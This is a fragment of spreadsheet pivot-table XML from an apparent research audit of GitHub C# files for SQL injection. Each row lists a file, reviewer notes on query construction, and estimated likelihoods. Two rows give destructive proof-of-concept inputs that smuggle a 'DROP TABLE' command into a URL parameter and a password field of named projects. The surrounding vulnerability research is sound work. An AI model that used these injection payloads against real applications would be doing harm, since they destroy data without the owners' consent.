    <s v="https://github.com/jslpower/bbl/raw/9ddfed237d9b5ad9833dda7de580f70265c1b5a5/EyouSoft.DAL/FinanceStructure/OtherCost.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fitspfr/pfr/raw/a629ce0f4b02179399249c44915e0f6317d748b1/src/Orchard/Data/Migration/Interpreters/DefaultDataMigrationInterpreter.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/damancurry88/openvss/raw/3b5a44a6ebe5450835016a141c5a7dcf027f53c4/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/Samples/TableEditor/CS/Form1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ghostceo/FinalFramework/raw/b4b294de96892a464baff92db230e5b9a5a3052e/FirServer/FirServer/Managers/SQL/MySqlHelper.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-02T00:00:00"/>
    <s v="https://github.com/onuruulusoy/WebApplication1/raw/6276284502b92bf3ec1c86503f3415e64681b644/WebApplication1/UrunDetay.aspx.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="26"/>
    <x v="1"/>
    <s v="SQL-IA"/>
    <s v="Set up the DB. When the web app is launched, navigate to the following url: http://localhost:52862/UrunDetay.aspx?urun_adi=%';DROP TABLE urunler;--"/>
    <s v="100_x000a_%"/>
    <n v="90"/>
    <m/>
  </r>
  <r>
    <d v="2023-08-02T00:00:00"/>
    <s v="https://github.com/renfushuai/AutoDapper/raw/520fff476ccc6fbff831a97df19127bd0eb2b8d3/XDF.Core/Helper/Db/MySqlDapperHelper.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="86"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Numerous function parameters are concatented into the queries. Many different injections, including some SQL-IDIAs, are possible, depending on how the functions are used."/>
    <s v="50_x000a_%"/>
    <n v="15"/>
    <s v="Uses Docker"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/HafizAhmadHassan/CompilerConstruction/raw/2c4d1370b7421e205dbdda67888fabb55e28397a/MYAIRLINE/web/Final%20Air%20ticket/Pass_Report2.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/AGYSolution/Gates/raw/943200979e45ae7c6f0217b26d16486fa2d3a663/ITI.Gates.Console/ITI.Gates.Console.DAL/DAL/ContCardDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/poshtkohi/web-development/raw/60a117354ff0d77fdb19535be14aaaf05a56c141/IranBlog/services/blogbuilderv1/poll.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yogeshpatel07/C_Sharp-ToDo_Manager/raw/d4199ad6e3f0312aa365d0aa11c5ce692431f863/My_Assist/My_Assist/TimeTableFrm.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Georgrigz/MayBeCoffee/raw/ab594d49c6028291529678ee8698a428481e7e3d/WinFormsApp1/AdminForm.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/volkanytu/NEF/raw/306d1e3342b253a2be736aa99b3df9fc1e891ce3/ConsoleApp/NEF.ConsoleApp.SendMarketingList/GetSmsResponse.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/moonfaruk/Sales-and-Inventory-Management-System/raw/47f444054db31740b6b313bf8a294e8c3354566a/LibraryManagementSystemFinalVersion/DAL/BankGateway.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/hearttosun/littleU_Encryption-storage-system/raw/8428e2b6f62d9798e7cec95dd47b05e300d4eb38/littleU_Encryption-storage-system/%E5%B0%8FU/PwdChange.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/itskrsna/CommonForum/raw/904d8a09342b9a7468a252ab225e3b1a856f0ff2/ServiceStack.OrmLite/src/ServiceStack.OrmLite/OrmLiteWriteCommandExtensions.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/laogaocheng/SalaryCalculation/raw/3d024b1f052fc1f67be26aa98750cbe76aae6a08/Components/Entities/EffectivePerformanceSalaryInput.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/avendatagmbh/Viewbox_old_2021-/raw/1d0d455ec9fd086115b52b8979bed039ad653b4b/Projects/Shutdown/Libraries/ViewboxDb/TempDb.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/LeoGD/UTN-Delesmar/raw/c1c050eb18ddb6d486219a62e70ae46c56bd26ca/TP%20-%20Gestion%20de%20vuelos/TP%20-%20Gestion%20de%20vuelos/ABM/Pasajeros/ModificarPasajero.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tuhuhu/LunchSystem/raw/4f63d6d20eaaef3a56f5e08143dd714b9fe61e50/SystemSetup.DataAccess/Maint/OrgMaintDa.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/newboysyb/FGBTv2/raw/aecea6fada4e456cb7e578b0394f89363a8b5f25/Discuz.Album/Data/SqlDataProvider.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Artexacta/KPITool/raw/fc4d4f29b1a2657e533f5fa6182521571d58f3d4/Software/KPITOOLWebApp/App_Code/BLL/KPI/KPIBLL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/SheharaNiwantha/WD_R_22_Timetable/raw/d909ac8af35d38876aeacb14862ec9df53d8ab6c/AddLocation.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/micro-chen/STO.Print/raw/58eafd73a7f7ce36db25ac662246412584a7f466/DotNet.Business/DataAccess/Manager/BaseContactManager.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-01T00:00:00"/>
    <s v="https://github.com/PhanDungTri/ComputerWebShop/raw/f993aae83b35a021e9f7abc66fa89eeb0f329f6c/ComputerShopApi-master/DAL/ProductDAL.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="55"/>
    <x v="12"/>
    <s v="Did not install"/>
    <s v="In the GetAll function, if the search parameter is not sanitized, injection is possible."/>
    <s v="10_x000a_%"/>
    <s v="120+"/>
    <s v="Time limit exceeded. Web app could not be launched due to numerous compiler errors."/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/HaVanVu1708/WebForm_Lap05/raw/4ed4a8cffd89aadd2a0d9c0bb009d61a6cafef7e/Jobsitewk12/Jobsitewk12/BLL/CompanyBLL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gulergunes55/Ticari_Otomasyonnn/raw/a99cfdf88d957b7a709e2ae9f484d58a6a14e5b7/FrmFirmalar.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/danny4ever12/BonVoyage1/raw/e728b226bb4acf7b5521e4b7a1295104e57dca5e/TouristSpots.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/sabika19/GenericRecruitment/raw/799fc1ef2ad2f263f7d19938a8b59980d1999b6b/kvs/applogin.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-01T00:00:00"/>
    <s v="https://github.com/Pawel-dtas/Wealthy-RPT/raw/2673c7c49506a1f07923bc162cd4a061f21cb703/Wealthy%20RPT/PeriodImport.xaml.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="47"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="The SQL statement concatenates a function paramater as the name of a table, but this parameter is hardcoded in all the calls to the function"/>
    <s v="_x000a_1_x000a_%"/>
    <n v="15"/>
    <s v="100% C#. Configuration file  lclRPT.ini is missing"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/paulinethornberg/Yatzy/raw/c0fb84ed0857dd9a8917d320ccdf14fa0a80dc19/Yatzee/SQLHandler/SQLUtils.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ram-acke/My-Toy-Shop-in-ASP.Net-Framework/raw/d637433fb8c193cb7b7984b3c55c72a1247204be/user/view.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/sabrinamarinho/DevPlus/raw/58ae7a9287c7f924c8202a1e20815626d8c23cd5/DEVPLUS/DEVPLUS/LOGIN/Login.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/rahuljazzwal/BooklistUrl/raw/d711c97644bca3bd170c05dfc2984df50f5c9f3c/booklistRL/showBook.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/XiaoXianNv-boot/LOYADE/raw/49b7486c5b8fe42a9833a46f92bf1088c7ed53da/LOYADE/LOYADE.DATA/ActionDBOracle.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/philanderson888/c-sharp/raw/532481ee11f35f4e25890cf6c3fef6953dca0a4c/Database_16_Stored_Procedure_Delete/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Ludovica-12/Week6.Exceptions/raw/e34456b0043302b9b43d9908793a8bf77f0bb127/Week6.Exception.Exercise/ADO/Repositories/UserAdoRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fridl-snyk/csharp-test/raw/32f904f87c4fa10005686093e83edbd42fbae61f/src/testcases/CWE643_Xpath_Injection/CWE643_Xpath_Injection__Database_73a.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/D13CNPM4-nhom4/qlsv_1/raw/561204d5962becdcd0b16aecf5a78027b58b4407/QLLopHP.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/JanPichl/JulietTestSuite/raw/663dbb2347a4f08f77f63e94376f17e4f21aaef6/Juliet_Test_Suite_v1.3_for_C%23/src/testcases/CWE197_Numeric_Truncation_Error/s06/CWE197_Numeric_Truncation_Error__int_Database_to_byte_15.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/patrickwensel/AppointMaster/raw/3d1545bfd3a69fcb81bb3777d65128c7229749d8/Archive/LeadBean/confirm.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/denisnaste14/Second-Year-Student-ComputerScience/raw/42ac11401f65047806f2c862714c728f1cddbf75/C%23-CarRacingProject/Repository/DB/CursaDbRepo.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/anhdailaso/HRM/raw/1742296f07c4eb2a01faa800ee4881fa3697c85c/03.Vs.Category/Vs.Category/Forms/frmEditNGACH_LUONG.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/efraingtz/leposwpf/raw/89451926aab6b9509ec973ddcbebeb0247eb6bc1/LeposWPF/Helpers/Clases/CompanyHelper.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gurbuzadem2014/GPTS2020/raw/82b1f3f367244bf6451e243adf8c923c65fd6a92/frmMarkaKarti.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/SandaniM/Hospital-Management-System/raw/36cda41ac4c1151bf9f1db1963cf89c9be62c654/Form2.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tanvir-ahmed-aiub/ap.netfal21_B/raw/0c0b66937e7e9ed4b338d530fd3e9eecd967f009/Lecture%204/Lecture%203/Models/Tables/Users.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/onurozen1/PersonelTakipOtomasyonuProjesi/raw/8ac31c43dabed01ce2336c1961af999026807f96/PersonelTakipOtomasyonu/PersonelTakipOtomasyonu/MaasZamlari.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/issofttech2015/SecondSightEyeHospital/raw/df457eb0753776fb6acef38662e9188212c9f9b9/SecondSightWeb/SecondSightWeb/DAL/SELECTDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/moonfaruk/Sales-and-Inventory-Management-System/raw/47f444054db31740b6b313bf8a294e8c3354566a/LibraryManagementSystemFinalVersion/DAL/BookSpecimanGateway.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mohammaddanish2020/TestRepository/raw/108c8f0ae2efad50b4c7a5f71c7024c1bd8327bc/Marefat.Khatam.School/DirtyUI/Form1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-07-31T00:00:00"/>
    <s v="https://github.com/roryArchive/CaptivePortal.POC/raw/022eb4536b924e1b2c6d6b90979597d41abb3fa8/CaptivePortal.DataAccessModule/RegisterDB.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="36"/>
    <x v="13"/>
    <s v="SQL-IA"/>
    <s v="Start up the app. Go to register. Enter a valid username and email. Enter the following for the password: a'); DROP TABLE userinfo;--"/>
    <s v="100_x000a_%"/>
    <n v="105"/>
    <m/>
  </r>
  <r>
    <d v="2023-07-31T00:00:00"/>
    <s v="https://github.com/Kesco-m/Kesco.Lib.Entities/raw/8d896fba88be433e31554ec6183b72349ad128da/Corporate/Net/Net.cs"/>
    <x v="4"/>
    <x v="1"/>
    <n v="134"/>
    <x v="14"/>
    <s v="Did not install"/>
    <s v="All SQL statements are parameterized"/>
    <s v="1_x000a_%"/>
    <n v="90"/>
    <s v="Protected library"/>
  </r>
  <r>
    <d v="2023-07-28T00:00:00"/>
    <s v="https://github.com/DirectumCompany/IsblCheck/raw/049e3246e437af4c6f55add0d1d8decba6abe30d/src/IsblCheck.Context.Development/Database/Handlers/ScriptDatabaseHandler.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="58"/>
    <x v="15"/>
    <s v="Did not install"/>
    <s v="Hardcoded"/>
    <s v="_x000a_1_x000a_%"/>
    <n v="60"/>
    <s v="Build errors, could not get the project running"/>
  </r>
  <r>
    <d v="2023-07-28T00:00:00"/>
    <s v="https://github.com/qq5013/HNXC/raw/7bcfad95eae1bb87e60c62a54652f1943d84caef/WMS/THOK.Wms.Upload/Dao/UploadDao.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="20"/>
    <x v="16"/>
    <s v="Did not install"/>
    <s v="Many of the queries use preexisting data from the DB. Second order injection may be possible."/>
    <n v="0.1"/>
    <n v="15"/>
    <s v="Foreign Language"/>
  </r>
  <r>
    <d v="2023-07-28T00:00:00"/>
    <s v="https://github.com/omerfekrem/MOAgrossStok/raw/40b148bba63a22017798523d8b1b99032e2c2213/MOAgrossStok/ciroRaporlama.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="84"/>
    <x v="17"/>
    <s v="Did not install"/>
    <s v="Most SQL statements are hardcoded. Some concatenate variables that come from sanitized functions such as ToInt32. The query beginning on line 413 appears to concatenate input from a TextBox. Injection may be possible."/>
    <s v="75_x000a_%"/>
    <n v="70"/>
    <s v="Build errors, could not get the project running. Project is 100% C#"/>
  </r>
  <r>
    <d v="2023-07-28T00:00:00"/>
    <s v="https://github.com/shrikant-takale/ComputerCare/raw/ec37c36eb6c7d6dc7e37e0ce0248e5797d251479/ComputerCare/Operations/FrmGroupSMS.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="62"/>
    <x v="18"/>
    <s v="Did not install"/>
    <s v="The first query is hardcoded and selects the name attribute from the tblsession table. The first result from this query is concatenated into the second query. Depending on how the name attribute is sanitized, second order injection may be possible."/>
    <n v="0.1"/>
    <s v="120+"/>
    <s v="Time Limit exceeded. Needed to install SAP CrystalReports. Project is 100% C#"/>
  </r>
  <r>
    <d v="2023-07-28T00:00:00"/>
    <s v="https://github.com/CameronOlson/Blogger/raw/7d6a010f21a2d90c8bc72c1cbf513c81fa508dcb/Repositories/BlogsRepository.cs"/>
    <x v="1"/>
    <x v="3"/>
    <n v="22"/>
    <x v="19"/>
    <s v="Did not install"/>
    <s v="Hardcoded and uses prepared statements"/>
    <n v="0.01"/>
    <n v="15"/>
    <s v="Requires Docker"/>
  </r>
  <r>
    <d v="2023-07-28T00:00:00"/>
    <s v="https://github.com/manjarb/docker-dive-into-docker-course/raw/6c6c0ff7e63bf07df584273f9b670c4b83f86ede/doc/diveintodocker/src/07-docker-compose-in-the-real-world/06-managing-microservices-with-docker-compose/worker/src/Worker/Program.cs"/>
    <x v="1"/>
    <x v="4"/>
    <n v="134"/>
    <x v="20"/>
    <s v="No"/>
    <s v="Some statements are hardcoded, those that aren't have all user input going into prepared statements"/>
    <n v="0.01"/>
    <n v="70"/>
    <s v="Did not install Docker in the VM due to nested virtualization not being supported"/>
  </r>
  <r>
    <d v="2023-07-27T00:00:00"/>
    <s v="https://github.com/smart1125/LandBankPushManagement/raw/c3a35bc44923e6739b22a577ae930b05cdbe5830/PushManagement/PushWhitelist.aspx.cs"/>
    <x v="3"/>
    <x v="2"/>
    <m/>
    <x v="4"/>
    <s v="Did not install"/>
    <m/>
    <m/>
    <n v="0"/>
    <s v="404 error when loading repo"/>
  </r>
  <r>
    <d v="2023-07-27T00:00:00"/>
    <s v="https://github.com/sessionliang/os/raw/cf8fa4ea87c5bd23f5eb25ed3600ce63168af29e/ss/PMS/SiteServer.Project/Provider/Data/SqlServer/Local/PMS/ApplyDAO.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="63"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Variables are interpolated into SQL statements. Some of these variables are constants, others come from other functions. The code may be vulnerable."/>
    <n v="0.25"/>
    <s v="120+"/>
    <s v="Time limit exceeded"/>
  </r>
  <r>
    <d v="2023-07-26T00:00:00"/>
    <s v="https://github.com/mfagadi/openvss/raw/3b5a44a6ebe5450835016a141c5a7dcf027f53c4/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.Data/Tests/Source/Syntax.cs"/>
    <x v="5"/>
    <x v="1"/>
    <n v="453"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="The &quot;database0&quot; variable is concatenated in place of a table name, but this variable appears to be statically defined in BaseTest.cs"/>
    <n v="0.05"/>
    <n v="15"/>
    <m/>
  </r>
  <r>
    <d v="2023-07-26T00:00:00"/>
    <s v="https://github.com/KenAdeniji/WordEngineering/raw/9ce2e29fdaf49154f9416ead251b90d845ef2c6f/IIS/WordEngineering/Bing/Map/BingMapCenterPointLatitudeLongitude.aspx.cs"/>
    <x v="1"/>
    <x v="3"/>
    <n v="43"/>
    <x v="13"/>
    <s v="No"/>
    <s v="All user input goes is sanitized or goes into prepared statements"/>
    <n v="0"/>
    <n v="120"/>
    <s v="The webpage fails to load due to errors; user can't input anything"/>
  </r>
  <r>
    <d v="2023-07-26T00:00:00"/>
    <s v="https://github.com/Essort/openvss/raw/e0af68f101be26a7c9a677d34ab2273d5eaf1b6a/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.Data/Tests/Source/DataAdapterTests.cs"/>
    <x v="5"/>
    <x v="1"/>
    <n v="239"/>
    <x v="21"/>
    <s v="Did not install"/>
    <s v="ALL SQL statements are hardcoded. User input is never inserted into them. The SQL statement on line 239 concatenates a loop counter variable"/>
    <n v="0.01"/>
    <n v="60"/>
    <m/>
  </r>
  <r>
    <d v="2023-07-25T00:00:00"/>
    <s v="https://github.com/Devaniti/Semester5Labs/raw/32c4f13093cef298c27ea535afac75dad7461b2e/DB2/LR2/DBLab2/OSLab2/MainWindow.xaml.cs"/>
    <x v="2"/>
    <x v="3"/>
    <n v="35"/>
    <x v="22"/>
    <s v="No"/>
    <s v="SQL statements are mostly hardcoded; some parts of them are interpolated. The interpolated parts come from static readonly string arrays, randomly generated numbers, and TimeSpan evaluation. User input is only used to determine the number of records to add to the Client table."/>
    <n v="0"/>
    <n v="90"/>
    <m/>
  </r>
  <r>
    <d v="2023-07-25T00:00:00"/>
    <s v="https://github.com/Isidorito/testNET/raw/9c26e9f9b4097c569b79825a84327ec568f0af09/snippets/csharp/VS_Snippets_ADO.NET/DataWorks%20SqlBulkCopy.ConnectionString/CS/source.cs"/>
    <x v="6"/>
    <x v="4"/>
    <n v="18"/>
    <x v="7"/>
    <s v="No"/>
    <s v="Hardcoded"/>
    <n v="0"/>
    <n v="30"/>
    <s v="&quot;This repo contains all the sample code that is part of any topic under the .NET documentation. &quot;"/>
  </r>
  <r>
    <d v="2023-07-25T00:00:00"/>
    <s v="https://github.com/securitylong100/LONG_FW/raw/f686809a9bdc625cc5e9dec4a1021ef265d82015/NidecMES/GlobalMasterMaintenance/Dao/GroupMachine/UpdateGroupMachineDao.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="18"/>
    <x v="23"/>
    <s v="No"/>
    <s v="All user input goes into prepared statements"/>
    <n v="0"/>
    <n v="120"/>
    <s v="Project is 100% C# files, no ASP.Net or HTML or CSS or J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769C89-D783-40A1-BCD5-84CADF1F3CD6}" name="PivotTable1" cacheId="1040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B54:G72" firstHeaderRow="1" firstDataRow="2" firstDataCol="2"/>
  <pivotFields count="9">
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField axis="axisRow" dataField="1" compact="0" outline="0" showAll="0">
      <items count="6">
        <item x="3"/>
        <item x="4"/>
        <item x="1"/>
        <item x="2"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField axis="axisCol" compact="0" outline="0" showAll="0">
      <items count="4">
        <item x="1"/>
        <item x="2"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField axis="axisRow" compact="0" outline="0" showAll="0">
      <items count="6">
        <item x="0"/>
        <item x="1"/>
        <item x="2"/>
        <item x="3"/>
        <item x="4"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
  </pivotFields>
  <rowFields count="2">
    <field x="2"/>
    <field x="6"/>
  </rowFields>
  <rowItems count="17">
    <i>
      <x/>
      <x/>
    </i>
    <i t="default">
      <x/>
    </i>
    <i>
      <x v="1"/>
      <x/>
    </i>
    <i t="default">
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
      <x/>
    </i>
    <i r="1">
      <x v="1"/>
    </i>
    <i t="default">
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
      <x/>
    </i>
    <i r="1">
      <x v="2"/>
    </i>
    <i r="1">
      <x v="4"/>
    </i>
    <i t="default">
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
      <x/>
    </i>
    <i r="1">
      <x v="2"/>
    </i>
    <i r="1">
      <x v="3"/>
    </i>
    <i r="1">
      <x v="4"/>
    </i>
    <i t="default">
      <x v="4"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="3"/>
  </colFields>
  <colItems count="4">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </colItems>
  <dataFields count="1">
    <dataField name="Count of Interface Type" fld="2"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CB8E2F-CC74-40C0-AAB2-E5D68EEB7FDA}" name="PivotTable1" cacheId="1040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K114:P122" firstHeaderRow="1" firstDataRow="2" firstDataCol="1" rowPageCount="1" colPageCount="1"/>
  <pivotFields count="11">
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField compact="0" outline="0" showAll="0"/>
    <pivotField axis="axisRow" dataField="1" compact="0" outline="0" showAll="0" sortType="descending">
      <items count="8">
        <item x="6"/>
        <item x="4"/>
        <item x="2"/>
        <item x="3"/>
        <item x="1"/>
        <item x="5"/>
        <item x="0"/>
        <item t="default"/>
      </items>
      <autoSortScope>
        <pivotArea dataOnly="0" outline="0" fieldPosition="0">
          <references count="1">
            <reference field="4294967294" count="1" selected="0">
              <x v="0"/>
            </reference>
          </references>
        </pivotArea>
      </autoSortScope>
    </pivotField>
    <pivotField axis="axisCol" compact="0" outline="0" showAll="0">
      <items count="6">
        <item x="1"/>
        <item x="3"/>
        <item x="4"/>
        <item x="2"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField compact="0" outline="0" showAll="0"/>
